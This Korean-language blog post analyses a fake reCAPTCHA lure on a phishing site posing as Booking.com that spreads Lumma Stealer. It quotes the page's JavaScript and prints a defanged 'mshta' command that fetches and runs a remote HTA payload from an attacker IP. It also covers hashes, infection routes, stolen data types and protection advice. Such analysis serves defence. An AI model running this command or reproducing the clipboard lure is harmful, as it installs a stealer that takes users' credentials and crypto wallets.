오늘은 가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포되는 악성코드에 대해 글을 적어보겠습니다. 해당 Lumma Stealer는 2022년 8월부터 러시아 어 포럼의 MaaS(Malware-as-a-Service) 모델을 통해 제공되었으며 주로 암호화폐 지갑(가상화폐 지갑)과 2단계 인증(2FA) 브라우저 확장 프로그램을 표적으로 삼은 후 궁극적으로 피해자의 컴퓨터에서 중요한 정보를 훔치는 것을 하고 있습니다.
Lumma Stealer는 맬웨어 서비스 모델로 운영되므로 구독을 구매할 재정적 여력이 있는 사람이라면 누구나 이용할 수 있으며 손상된 컴퓨터에서 악성코드 활동을 모니터링 하고 관리할 수 있는 명령 및 제어(C2) 패널에 대한 액세스가 포함이 됩니다.
일단 간단하게 제가 한번 예를 들어보겠습니다.
hxxps://id-58477931(.)com/
이라는 사이트입니다. 해당 악성코드 사이트는 Booking(부킹닷컴) 호텔 등의 숙박 시설에 대한 온라인 예약을 다루는 웹사이트 및 애플리케이션 프로그램입니다.
해당 페이지는 이런 해외여행 같은 것을 호텔 및 숙박을 하시는 분들의 사이트를 노리고 제작된 사이트입니다.
그리고 캡차(CAPTCHA)는 컴퓨터와 사람을 구분하기 위한 도구인데 보통은 이런 것을 자주 보여서 잘할 것입니다. 그러나 악성행위를 하시는 분들은 이런 사람들이 익숙한 기능을 확인합니다.
여기서 보면 다음과 같이 글자가 적혀져 있는 것을 확인할 수가 있습니다.
여기서 보면 다음과 같이 글자가 적혀져 있는 것을 확인할 수가 있습니다.
Robot or human?
Check the box to confirm that you're human.
Thank you!
구글의 reCAPTCHA 2.0 버전 하고 똑같이 생겨 먹어서 이게 진짜인 줄 알 것입니다. 이것은 사실은 속임수입니다.
윈도우 버튼+R 키를 누른 다음 CTRL+V를 누른 다음 키보드에서 엔터 키를 누르도록 지시하는 확인 단계 팝업이 사용자에게 표시됩니다. 컴퓨터에 대한 합리적인 지식이 있는 사람이라면 첫 번째 단계에서 프로그램을 빠르게 실행하는 데 사용되는 윈도 실행 대화 상자가 시작된다는 것을 알고 있을 것입니다.
CTRL+V는 붙여 넣기를 위한 키보드 단축키이며 Enter를 누르면 붙여 넣은 명령이 실행됩니다. JavaScript(자바 스크립트)가 클립보드에 PowerShell 명령을 추가했으므로 해당 단계를 따르면 PowerShell(파워셀) 명령이 실행되고 Lumma Stealer의 다운로드 및 실행이 트리거 되는 방식입니다.
그리고 해당 웹 사이트의 소스를 보면 다음과 같은 러시아 어 가 있는 것을 확인할 수가 있을 것입니다.
Ожидаем сообщения от iframe
window.addEventListener('message', (event) => {
// Проверяем источник сообщения, если требуется (например, по event.origin)
if (event.data === 'showMainElement') {
let verElement = document.getElementById("verification");
verElement.style.display = "block";
}
번역기 돌려 보면 다음과 같이 번역이 됩니다.
iframe에서 메시지를 기다리고 있습니다.
window.addEventListener('message', (이벤트) => {
// 필요한 경우 메시지의 출처를 확인합니다(예: event.origin을 통해).
if (event.data === 'showMainElement') {
let verElement = document.getElementById("검증");
verElement.style.display = "차단";
}
그러면 다음과 같은 코드가 생성된 것을 확인할 수가 있습니다.
악성코드
mshta hxxp://5(.)253(.)59(.)210:7777/confirma1(.)com/Captcha #
❇️ ''I am not a robot - reCAPTCHA Verification ID: 11341'악성코드 행위
mshta.exe를 사용하여 원격 서버에 호스팅 된 HTML 응용 프로그램(HTA 파일)을 실행을 하면 실제적으로는 악성 스크립트를 실행 경우입니다.
1.mshta:
mshta.exe 는 Microsoft에서 제공하는 프로그램으로. hat 확장자를 가진 HTML 응용 프로그램을 실행
악성 행위를 하는 공격자들은 해당 프로그램을 악용하여 원격 서버에서 제공하는 JavaScript나 VBScript 아니면 파워셀을 실행을 합니다.
2.hxxp://5(.)253(.)59(.)210:7777/confirma1(.)com/Captcha:
원격 서버 5(.)253(.)59(.)210 에 위치한 리소스를 가리키고 있으며 포트 번호는 7777이며, 경로는 /confirma1(.)com/
서버가 제공하는 악성코드 스크립트가 실행되어 악성 코드가 동작하게 돼 있습니다.
해당 경우에는 다음과 같은 악성코드를 실행하게 돼 있습니다.
파일명: Captcha
사이즈:1,422,442 Bytes
MD5:55cc925d87797284145dbc82486769d0
SHA-1:fa843b0c5b3409e1f77ee10a2ec573d1fbd3d2e5
SHA-256:d41a963135b51adcdd95f5f00a92cebe99b3506a58a9e3947028a73f8f915690
이런 감염 경로는 다음과 같이 됩니다.
유튜브 동영상 사이트이다. 동영상 받으려고 일단 네가~니겐인것 증명하라 하는 방식
유튜브 동영상에서 크랙된 프로그램을 받으려고 링크가 포함된 악성 동영상이 유튜브에 업로드 되고 이 링크를 클릭하면 사용자의 장치에 악성 코드가 감염되는 방식
GitHub:피싱 이메일이 GitHub 사용자에게 전송되어 취약점을 알리는 것처럼 보이게 해서 이메일의 링크를 클릭하면 악성 코드를 다운로드하는 가짜 페이지로 이동하는 방법
검색 엔진:크랙된 게임이나 불법 복제 게임을 검색하는 사용자는 악성 검색 결과 에서 SEO를 겁나게 잘해서 노출 해서 악성 코드를 다운로드하는 웹사이트로 연결되는 방식
Lumma Stealer 작동 방식
사용자에게 나는 로봇이 아닙니다. 버튼을 클릭하도록 유도하여 악성 스크립트를 클립보드에 복사그런 다음 사용자에게 Windows 실행 대화 상자에 해당 스크립트를 붙여 넣고 실행하도록 지시
이렇게 하면 사용자의 시스템에서 악성 코드가 실행됩니다.
Lumma Stealer 로부터 보호하는 방법
안티바이러스 및 안티맬웨어 소프트웨어를 설치하고 업데이트
이메일이나 유튜브 동영상에 있는 단축 URL을 클릭 하지 말기
크랙된 소프트웨어나 불법 복제 소프트웨어를 다운로드 하지 말기
알 수 없는 발신자의 이메일을 조심하고 링크를 클릭하지 금지
나는 로봇이 아닙니다. 버튼을 클릭하기 전에 신중하게 생각(이것은 상식적으로 복사 붙여넣기 해라고 생각을 하면 그냥 100%이라고 생각을 하시면 됩니다.)
그리고 굳이 불법 게임, 프로그램이 아니더라도 지금 소개해 드린 방법 대로 부킹닷컴,아마존,Ebay 등과 같은 사이트를 피싱 사이틀 통해서 만드는 방법
아니면 드라이버 업데이트 같은 방식으로 어느 방식으로 가능합니다.
보통 이런 악성코드가 수집하는 것들
데이터 탈취
웹 브라우저:크롬, 파이어폭스, 엣지 등 주요 브라우저에서 저장된 로그인 자격 증명(아이디, 비밀번호), 자동 완성 데이터,쿠키 등을 탈취
암호 화폐 지갑(가상화폐 지갑):
메타마스크, 트러스트 월렛 등과 가상화폐 지갑에서 지갑 파일과 개인 키를 수집
FTP/SSH 클라이언트:FileZilla, WinSCP 등에서 저장된 FTP/SSH 자격 증명을 수집
VPN 클라이언트:NordVPN,OpenVPN,ProtonVPN 등 VPN 설정 파일을 탈취하여 네트워크 접근 권한
디스코드 토큰:디스코드 세션 토큰을 탈취하여 계정에 접근
스크린샷 캡처:화면을 캡처하여 공격자에게 전송합니다.
시스템 정보 수집: 운영 체제 정보, 하드웨어 사양, IP 주소 등 기본 시스템 정보를 수집
보통은 이런 것들입니다.
기본적으로 백신 프로그램을 사용하고 그리고 제일 보조적으로 검증된 브라우저에서 피싱이나 악성코드 유포되는 사이트를 차단해주는 부가기능을 활용하는 것을 권장합니다. 물론 이런 것이 100% 차단을 해주지 않지만 그래도 최대한 보호를 받을 수가 있으며 기본적으로 사용자의 주의가 필요합니다. 그리고 아무런 생각 없이 클릭을 하지 않는 것이죠. 한국에서 다음다음 버튼 누르는 습관하고 같은 것입니다.
끝
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 텔레그램 사용자 정책 위반 사칭 피싱 사이트-hvil-telegram(.)org(2025.1.6) (0) | 2025.01.13 |
|---|---|
| NordVPN(노드 VPN) 포스트 퀀텀 기능 업데이트 (0) | 2025.01.09 |
| 정체를 모를 APT 에서 만든 교통 범칙금 과태료 미납 내역.lnk(2024.7.14) (0) | 2025.01.08 |
| 북한 라자루스(Lazarus)에서 만든 브라우저 스틸러 악성코드-11.js(2024.12.28) (0) | 2025.01.06 |
| TP-Link 공유기 CVE-2024-53375 취약점 간단 분석 (0) | 2025.01.02 |
| 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료,신년 노드 VPN 70% 할인) (2) | 2025.01.01 |
| 북한 APT 리퍼(Reaper)에서 만든 악성코드-동북공정(미국의회조사국(CRS Report).pdf.lnk(2024.4.3) (0) | 2025.01.01 |
| 윈도우 11 KB5048685 업데이트로 인해 와이 파이 및 시작 메뉴 작동이 중지됨 (0) | 2024.12.27 |
